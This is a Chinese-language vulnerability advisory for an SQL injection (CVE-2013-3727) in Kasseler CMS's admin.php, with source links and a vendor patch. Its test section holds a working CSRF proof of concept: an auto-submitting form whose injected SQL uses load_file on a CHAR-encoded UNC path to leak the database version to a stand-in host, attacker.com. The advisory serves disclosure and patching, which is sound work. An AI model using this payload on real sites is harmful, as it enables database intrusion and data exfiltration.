Kasseler CMS 'groups' SQL注入漏洞


发布日期:2013-07-03
更新日期:2013-07-07

受影响系统:
Kasseler CMS Kasseler CMS <= 2 r1223
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60928
CVE(CAN) ID: CVE-2013-3727

Kasseler CMS是内容管理系统。

Kasseler CMS 存在SQL注入漏洞,此漏洞源于"/admin.php"脚本内的"groups" HTTP POST参数缺少足够的过滤。经过身份验证的远程管理员可利用此漏洞在应用数据库内执行SQL命令。此漏洞也可被未经身份验证的远程攻击者通过CSRF利用。

<*来源:High-Tech Bridge Security Research Lab
 
  链接:https://www.htbridge.com/advisory/HTB23158
        http://seclists.org/bugtraq/2013/Jul/26
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<form action="http://[host]/admin.php?module=sendmail&do=send " method="post" name="main">
<input type="hidden" name="title"  value="1">
<input type="hidden" name="message"  value="1">
<input type="hidden" name="attache_page"  value="1">
<input type="hidden" name="groups[]"  value="123) OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
-- ">
<input type="hidden" name=""  value="">
<input type="hidden" name=""  value="">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://diff.kasseler-cms.net/svn/patches/1232.html

相关内容

    暂无相关文章